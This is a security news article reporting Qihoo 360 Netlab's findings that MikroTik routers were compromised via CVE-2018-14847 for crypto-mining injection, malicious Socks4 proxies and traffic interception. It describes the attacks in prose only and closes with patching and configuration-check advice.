Widespread Compromise of MikroTik Routers Exposes Vulnerabilities
Recent reports have unveiled an alarming situation involving a significant number of MikroTik routers that have fallen victim to cyber exploitation. Last month, we noted a major crypto-mining malware operation responsible for the hijacking of over 200,000 MikroTik devices, utilizing a vulnerability linked to the CIA’s Vault 7 leaks. In further developments, researchers from Qihoo 360 Netlab have identified that more than 7,500 out of approximately 370,000 potentially affected routers have been maliciously configured to enable Socks4 proxy access, allowing attackers to monitor network traffic since mid-July.
The vulnerability at the center of this infiltration, known as Winbox Any Directory File Read (CVE-2018-14847), was found to be exploited using a CIA-backed hacking tool, Chimay Red. This flaw, along with another vulnerability in MikroTik’s Webfig, allows unauthorized access to RouterOS management functions, which typically operate through ports TCP/8291, TCP/80, and TCP/8080. Winbox, designed for Windows users, enables easy configurations via the download and execution of files from the router itself.
Qihoo 360’s investigations indicate that despite prior security updates rolled out by MikroTik, over 370,000 of the 1.2 million devices analyzed remain susceptible to CVE-2018-14847. The researchers uncovered malware that exploits these vulnerabilities for nefarious purposes. Threat actors have been injecting CoinHive mining code, subtly activating Socks4 proxies on compromised devices, and monitoring user activity without detection.
The CoinHive mining injection takes place after the attacker activates the MikroTik RouterOS HTTP proxy, redirecting all proxy requests to a local error page. This page attempts to embed web mining code intended for those connecting through the compromised proxy. However, the effectiveness of this tactic has been called into question, as the attacker’s own access control lists block critical external resources needed for proper mining functionality.
Malicious activation of the Socks4 proxy, located on TCP/4153, further intensifies risk by allowing attackers to maintain control over compromised devices, even post-reboot. This is achieved by the proxy reporting the device’s latest IP address to the attacker’s designated URL periodically. Current data suggests that around 239,000 IP addresses have had this proxy maliciously enabled, facilitating ongoing scans of additional MikroTik devices.
In terms of intelligence gathering, compromised MikroTik routers allow operators to capture and redirect network packets, which attackers exploit to forward data to their controlled IP addresses. Researchers report that around 7,500 MikroTik devices’ traffic is being routed to these malicious destinations. Notably, the use of SNMP (Simple Network Management Protocol) ports 161 and 162 raises questions about whether attackers are aiming to monitor specific network activity that typically falls beyond the scope of regular users.
The affected users represent a global demographic, including individuals in countries such as Russia, Iran, Brazil, India, and the United States, with Russia reportedly being the most significantly impacted. While detailed lists of victim IP addresses remain undisclosed for security reasons, affected parties are encouraged to reach out to the researchers for assistance.
To mitigate these risks, MikroTik RouterOS users are urged to immediately apply vendor-released security patches and verify the settings for HTTP proxies, Socks4 proxies, and any network traffic capture features to prevent malicious exploitation. This incident serves as a stark reminder of the vulnerabilities within network infrastructures and the persistent threats facing organizations worldwide.
This exploitation appears consistent with tactics outlined in the MITRE ATT&CK Matrix, notably including initial access, persistence, and collection techniques. As cyber threats evolve, maintaining robust security practices remains paramount for safeguarding organizational assets.
